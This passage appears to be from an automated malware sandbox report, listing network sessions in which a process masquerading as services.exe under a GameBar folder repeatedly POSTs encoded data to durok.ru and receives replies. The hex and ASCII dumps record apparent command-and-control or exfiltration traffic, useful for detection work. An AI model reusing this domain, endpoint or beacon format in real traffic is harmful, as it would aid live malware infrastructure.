                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4861&min_rtt=2068&rtt_var=6361&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2851&delivery_rate=59804&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                               36 | 192.168.2.4 | 49777 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                                                               Dec 26, 2024 17:17:50.815862894 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                               Dec 26, 2024 17:17:51.181303978 CET | 2548 | OUT | Data Raw: 5c 59 5b 5a 51 5e 59 50 5e 58 52 54 56 51 58 55 54 56 5b 5c 56 51 53 5f 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \Y[ZQ^YP^XRTVQXUTV[\VQS_PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'+"0\<5#!<;>9*71$'Z4(U4Z>::4?V Y)5"Z.#Z*
                                                                                                                               Dec 26, 2024 17:17:51.957221031 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                               Dec 26, 2024 17:17:52.220014095 CET | 794 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:52 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i3OrvA20%2FbkUH7uVWVfHLfBCh6CEpET6iHDofym2TUSFrCmSXpAT9pDFVbbdGK2mDAQzeVK7u7dADgETs%2BAaNCsvP8EUH82jFnCGigQn0l1oroQ5xNWOZDJTBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82622abadd43f8-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4648&min_rtt=1724&rtt_var=6495&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=58121&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                               37 | 192.168.2.4 | 49778 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                                                               Dec 26, 2024 17:17:51.532876015 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2108
                                                                                                                              Expect: 100-continue
                                                                                                                               Dec 26, 2024 17:17:51.880644083 CET | 2108 | OUT | Data Raw: 59 5b 5e 51 51 5c 5c 57 5e 58 52 54 56 5a 58 55 54 57 5b 5a 56 50 53 55 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y[^QQ\\W^XRTVZXUTW[ZVPSUPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'++:"" ;."=4Y%'0 8Q"/>9<C> #="Z.#Z**
                                                                                                                               Dec 26, 2024 17:17:52.707736015 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                               Dec 26, 2024 17:17:52.961911917 CET | 946 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:52 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NXg6sZbInOfNCJTn0Dx9WJdEcqlFRgCn2KSEBo7k8UwWxVR5TZ78bjHJpiuEr32dXw249hNRbwQogb%2FQpVasS5D61j7S9Q5pq70m3XSpLDoxjW2%2Fc6v7L6Qu%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82622f6b89558a-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8437&min_rtt=1593&rtt_var=14285&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2415&delivery_rate=25911&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              38 | 192.168.2.4 | 49779 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:17:52.478810072 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:53.656728029 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:53.910047054 CET | 793 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:53 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g4AzGO0DmNbYkiw6pUCoGjzRMW3Vc8Cmr1Ls20HvJLRLiGMdrb2P3Wdc2uEFO48gsit6kLXgUr%2Bn401yDrH5PQWbebW4u8EoQ1ifayg57ZuDHl9CY3LITZPfqA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826235596242f2-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3135&min_rtt=1716&rtt_var=3481&sent=5&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=111723&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0
                                                                                                                              Dec 26, 2024 17:17:54.056976080 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2108
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:54.391046047 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:54.913439035 CET | 946 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:54 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVyOrgc3rIcuxFGi0youv6uyM0Jwqyo9sH29SKOTSFF7l0hu40OHkd%2FnjyUlXtnKQ2kBJcaaFp93ZsYGMmFlFi6FuUhOS0wdcQ5MfrVLMgDbhs8jFnl6fhidIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826239ee6042f2-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4261&min_rtt=1716&rtt_var=4795&sent=10&recv=12&lost=0&retrans=0&sent_bytes=843&recv_bytes=5270&delivery_rate=1620421&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              39 | 192.168.2.4 | 49780 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:17:54.265453100 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:55.445168972 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:55.698139906 CET | 800 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:55 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vJ%2B3XBYKpGaL4qv0epqkJyslvNVFsB1%2Bukr7sIotNC4Ti0MGuCXExEukXdiRykH6h3CztIhUpDN4P%2B%2B0X2jUmsNc6SWiG%2B7QfyitSwMN2NHYjhBiQViwxQnUUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262407d370caa-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4145&min_rtt=1668&rtt_var=5579&sent=5&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=67957&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              40 | 192.168.2.4 | 49781 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:17:56.502676964 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:57.559779882 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:57.814156055 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:57 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pY0xPtoQzE6r3U6RpvaT%2B%2FtkUZibCasF495bRbcF0Uuo9uxN3tu%2FUsGOXZw3%2FKZ7rp0Bcf%2F2nuXEvlfZTz54T46g%2Fdbr2FRKKaiYwPJj9D5pr7Bld86WCbHcnA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82624dbf6e422b-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3833&min_rtt=2015&rtt_var=4393&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=88132&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              41 | 192.168.2.4 | 49782 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:17:56.502757072 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2108
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:57.558933020 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:57.809720993 CET | 951 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:57 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YXDLYQpedkxq%2FTzN%2Fv4OGSQWMhJKYobP9Rycx2YscgN2Y75LGSki4FTV%2FAmmlWssrM4UGXLvq9XFTxHA%2FEXGHlhZpD8fEX2z6xtBPb9h%2FyffQq5ng7%2FGx4BrdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82624dbfc7330c-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3706&min_rtt=1751&rtt_var=4567&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2415&delivery_rate=83936&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              42 | 192.168.2.4 | 49785 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:17:58.060703039 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 49786 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:17:58.939213037 CET | 331 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
Dec 26, 2024 17:17:59.311815023 CET | 2128 | OUT | Data Raw: 59 5d 5b 5c 51 5f 5c 51 5e 58 52 54 56 5a 58 5b 54 51 5b 55 56 54 53 5d 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y][\Q_\Q^XRTVZX[TQ[UVTS]PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'+!?)6! X;>=1$B# ,04<-)'?*5"Z.#Z**
Dec 26, 2024 17:18:00.162339926 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:00.422095060 CET | 946 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:00 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W7qTXgE3C6yzoFirG0wbXGsPd%2BhUtRcGFzDQ1zDrQNSrLsoDJp%2B36lH0cr9IY21d20AysuytbNVK0MZvjtdR9xni794T7Q83pDVWq4GYxTgA5EhIMWTEJ59V4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82625dde017c88-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=20290&min_rtt=10778&rtt_var=23066&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2459&delivery_rate=16805&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 00 2a 29 24 0a 20 3c 2c 51 2a 2d 39 0e 29 1f 39 1a 2a 21 25 14 28 06 31 0c 2b 06 24 0a 21 3a 32 5c 3e 14 28 1e 26 0f 3a 5c 31 21 2e 5c 05 1d 27 5b 3f 05 30 13 26 22 3e 07 3d 3e 31 1a 29 10 3d 16 24 2c 3c 01 20 15 2e 15 37 21 28 5d 2f 02 2f 03 2e 12 09 01 2b 33 2e 5a 21 3d 21 51 0c 1f 38 57 21 29 2b 58 27 3e 36 0f 36 0e 2b 50 32 2b 36 53 35 02 28 08 24 5c 24 04 31 33 0d 1e 23 03 2f 57 2b 3d 2e 13 24 3f 25 11 2b 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98'*)$ <,Q*-9)9*!%(1+$!:2\>(&:\1!.\'[?0&">=>1)=$,< .7!(]//.+3.Z!=!Q8W!)+X'>66+P2+6S5($\$13#/W+=.$?%+)%^-#T>TV0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 49787 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:17:59.140369892 CET | 331 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
Dec 26, 2024 17:17:59.614674091 CET | 2548 | OUT | Data Raw: 59 5f 5e 5d 54 5f 59 56 5e 58 52 54 56 58 58 51 54 55 5b 58 56 54 53 5e 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y_^]T_YV^XRTVXXQTU[XVTS^PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'</>)6"7;2>"_';[7<V"/%-:(>#8_)5"Z.#Z*"
Dec 26, 2024 17:18:00.309576035 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:00.561847925 CET | 798 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:00 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d95SgNV6NziUEoZDiQ6s6l%2FvARqEIAeFgwCvvPAYr24hday5%2FAZCxtCaDqp2avtm33%2FJWD2ikbZQdAaoOdB6ImDvAR7LpBFKOqZSap%2FcAsiWN4q9f2IFxOyX5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82625ee8dc7c99-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3906&min_rtt=2054&rtt_var=4475&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=86528&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 49793 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:00.950109959 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:01.304847956 CET | 2548 | OUT | Data Raw: 59 51 5b 5c 54 5c 5c 50 5e 58 52 54 56 5e 58 56 54 53 5b 5b 56 52 53 5c 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YQ[\T\\P^XRTV^XVTS[[VRS\PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT')!7(.!"/,%=$$#// =:9$A<#0*5"Z.#Z*


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 49794 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:01.555041075 CET | 331 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2108
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
Dec 26, 2024 17:18:01.897756100 CET | 2108 | OUT | Data Raw: 59 5b 5e 58 54 58 59 57 5e 58 52 54 56 5e 58 54 54 5d 5b 5c 56 51 53 5a 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y[^XTXYW^XRTV^XTT][\VQSZPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'("7+)W5T(Y.--W>.Y' 3"?9,9;>0'>"Z.#Z*
Dec 26, 2024 17:18:02.728480101 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:03.023091078 CET | 953 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:02 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
